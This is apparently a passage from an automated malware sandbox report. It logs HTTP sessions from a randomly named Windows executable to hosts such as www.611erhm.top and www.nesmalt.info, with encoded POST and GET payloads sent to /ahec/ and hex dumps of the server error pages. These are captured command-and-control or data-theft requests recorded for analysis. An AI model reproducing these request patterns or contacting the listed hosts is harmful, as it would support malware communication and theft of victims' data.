48 61 46 31 6e 76 79 5a 79 66 53 64 68 79 6e 37 41 57 54 34 45 38 47 72 56 54 65 4f 79 58 4b 6e 6d 70 46 4e 56 75 6b 74 71 72 67 66 6b 68 39 4a 33 4d 68 4f 33 56 49 62 44 55 63 49 59 47 73 36 58 54 7a 47 72 65 47 55 6a 54 77 69 4d 4b 51 49 43 45 6b 6a 4f 46 44 37 30 75 38 6c 70 72 32 4f 31 31 38 46 66 77 65 7a 38 38 37 30 6e 6c 39 55 47 4a 56 64 46 56 36 44 7a 78 51 6a 4a 2b 52 46 31 37 4e 51 35 67 33 66 64 59 70 6b 76 44 57 69 32 78 43 30 79 4f 75 68 57 7a 33 42 6a 51 45 71 52 2b 75 67 49 6d 77 39 44 51 33 37 6a 36 6c 78 54 4a 55 6d 77 51 58 34 44 67 6d 50 43 6d 30 68 75 38 44 4c 58 50 46 36 77 6f 6f 72 59 77 35 45 5a 4b 4d 4b 4c 52 79 70 74 72 2b 49 69 6f 39 54 37 70 32 56 6e 48 45 53 4a 63 72 70 75 78 76 30 2f 39 72 78 72 6a 6b 2f 34 69 41 59 4e 6c 7a 6b 66 45 76 7a 51 39 33 56 6e 66 56 73 70 55 73 4e 48 35 75 65 31 32 47 6b 57 31 4a 52 62 4b 36 75 48 61 31 62 2f 53 64 4d 69 2b 4a 5a 4f 55 77 44 2f 70 76 73 74 54 7a 41 42 41 2b 77 52 46 4f 58 42 57 79 35 56
                                                                          Data Ascii: KHcH=ORDmYl44AESw2UOB0RzxG1+zYnNINlFkCRpisVQfzKZlNxpcDOwacjvvDMKUdwEGCgGlOhJsUNCUG+q3+0NRUczgDLLXKgkWPALAt/JeYCqiwZ6tL4x56DY9ynX+jpPR/5htHvNy8eKdafHQD1KEhzoZI+DPuJIIT7TJQaWVNSwRlVAYxQg9+wVGNe09KM1og0vlsEEyUddmFAbFZ30RGbNx0EI4mmOpCZBNQ69or4tS/egQzsqNLGkthyFDDv90m5IBYhGZnBsZfKHKkWpA48LiqItdznyr2jzQ/oXSFk0OPYIRB1klF1W/q89Olov6f6BcY26E7umBzIxBjYOwTN09jyPVQgGi8rQxJ5HmmfivEkedLM4biqTcYPsTWd/yBvdrxdVByh5Yjr7dXvvPLnOz2SWQ1kehKKIqpeD8dUvrDofUAi2HFlsifmhSjiGQu3ObzkCwNJvEsIWPaRt9VmBECKk/Wdvc9TRKp2RrkzTU8navLX5kGEsOfViqDq2IWMahfaGLxJdQvoDtN+pYDKEpBpoSPNGdbeMLZMOSGwllUIj7zJ4LNhSc6D/H+OGls2pIJVLTUj0hKYqPfXJMRNcl2yDZQ2AffAwvP3KelluLfis04PGZsaii5az9WKXmoA+7RwmwgJkbexQv6CTJGPRNtW5Ihs0eemkEE9/fhwS7jSXO4gxIj+iBXJKSLwnccr4tLn36r6fv1CEqMfAbzgYA8cBD671Bz4vKHyF+EIgH5T4JEyoiOw2pQVs/RwkX0gMHUAG0Fk2ePnN8avXcft8PgYRBO7SSaqUWRXI8iyJg0RHbPjDNnSq7uzx0qHCwYIoGxPE+rDLuv693W1pAvUc4K90565+SelU3nFGYhMCieZZt2RkK/jsHaF1nvyZyfSdhyn7AWT4E8GrVTeOyXKnmpFNVuktqrgfkh9J3MhO3VIbDUcIYGs6XTzGreGUjTwiMKQICEkjOFD70u8lpr2O118Ffwez8870nl9UGJVdFV6DzxQjJ+RF17NQ5g3fdYpkvDWi2xC0yOuhWz3BjQEqR+ugImw9DQ37j6lxTJUmwQX4DgmPCm0hu8DLXPF6woorYw5EZKMKLRyptr+Iio9T7p2VnHESJcrpuxv0/9rxrjk/4iAYNlzkfEvzQ93VnfVspUsNH5ue12GkW1JRbK6uHa1b/SdMi+JZOUwD/pvstTzABA+wRFOXBWy5V
                                                                          Dec 2, 2023 18:49:33.039011955 CET1340INHTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:49:32 GMT
                                                                          Server: Apache
                                                                          Content-Length: 5278
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                                          Dec 2, 2023 18:49:33.039036036 CET1340INData Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33
                                                                          Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                                          Dec 2, 2023 18:49:33.039268970 CET1340INData Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e
                                                                          Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                                          Dec 2, 2023 18:49:33.039311886 CET1340INData Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35
                                                                          Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                                          Dec 2, 2023 18:49:33.039324999 CET333INData Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20
                                                                          Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          24192.168.2.54974366.29.155.54801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:49:35.461086988 CET516OUTGET /ahec/?Vjk=-N-tntX&KHcH=DTrGbTEHMG6Y4mKy1Dn1KlGSTxAaPAt5CR5S23I4xf5AWU1NMecScwq/Pr/mUgt4GFrPBjE4MJyXMuu59XRude7iecelPQFgCQ== HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.nesmalt.info
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:49:35.737441063 CET1340INHTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:49:35 GMT
                                                                          Server: Apache
                                                                          Content-Length: 5278
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-
                                                                          Dec 2, 2023 18:49:35.737471104 CET1340INData Raw: 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33
                                                                          Data Ascii: 23.58v-33.13c0-12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5
                                                                          Dec 2, 2023 18:49:35.737485886 CET1340INData Raw: 39 20 32 2e 30 33 20 31 2e 33 32 20 33 2e 37 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31
                                                                          Data Ascii: 9 2.03 1.32 3.75 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"
                                                                          Dec 2, 2023 18:49:35.737503052 CET1340INData Raw: 31 39 20 31 35 2e 32 37 20 33 2e 31 39 20 32 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36
                                                                          Data Ascii: 19 15.27 3.19 23.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.0
                                                                          Dec 2, 2023 18:49:35.737517118 CET348INData Raw: 75 73 73 69 61 6e 62 6c 75 72 20 63 6c 61 73 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20
                                                                          Data Ascii: ussianblur class="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          25192.168.2.54974434.117.26.57801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:49:41.854471922 CET785OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.611erhm.top
                                                                          Origin: http://www.611erhm.top
                                                                          Referer: http://www.611erhm.top/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 5a 61 38 52 52 54 6d 44 7a 45 41 5a 64 2b 4c 42 72 36 52 57 6c 73 7a 65 42 6e 62 35 71 67 76 38 33 4b 77 36 79 31 46 6b 78 34 56 6c 78 59 39 36 70 64 34 6a 45 72 49 4f 69 6e 54 6c 63 33 62 58 75 53 61 6e 42 48 6a 6a 45 58 2f 4a 35 43 4c 6a 32 73 75 59 4c 71 2f 30 42 75 66 30 57 76 47 35 4b 6c 57 49 63 56 33 6b 76 46 4e 59 32 72 50 39 4d 4f 2b 75 30 4d 46 69 58 68 4d 77 41 69 69 43 4f 77 61 51 6d 57 78 72 39 5a 69 39 35 68 66 35 7a 36 57 78 68 70 6e 44 33 6b 52 6c 31 4e 64 55 76 6e 2b 4d 6f 68 67 33 4d 66 59 44 7a 32 7a 4c 4b 77 3d 3d
                                                                          Data Ascii: KHcH=Za8RRTmDzEAZd+LBr6RWlszeBnb5qgv83Kw6y1Fkx4VlxY96pd4jErIOinTlc3bXuSanBHjjEX/J5CLj2suYLq/0Buf0WvG5KlWIcV3kvFNY2rP9MO+u0MFiXhMwAiiCOwaQmWxr9Zi95hf5z6WxhpnD3kRl1NdUvn+Mohg3MfYDz2zLKw==
                                                                          Dec 2, 2023 18:49:42.141279936 CET387INHTTP/1.1 405 Method Not Allowed
                                                                          Server: nginx/1.20.2
                                                                          Date: Sat, 02 Dec 2023 17:49:41 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 157
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          26192.168.2.54974534.117.26.57801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:49:44.486354113 CET805OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.611erhm.top
                                                                          Origin: http://www.611erhm.top
                                                                          Referer: http://www.611erhm.top/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
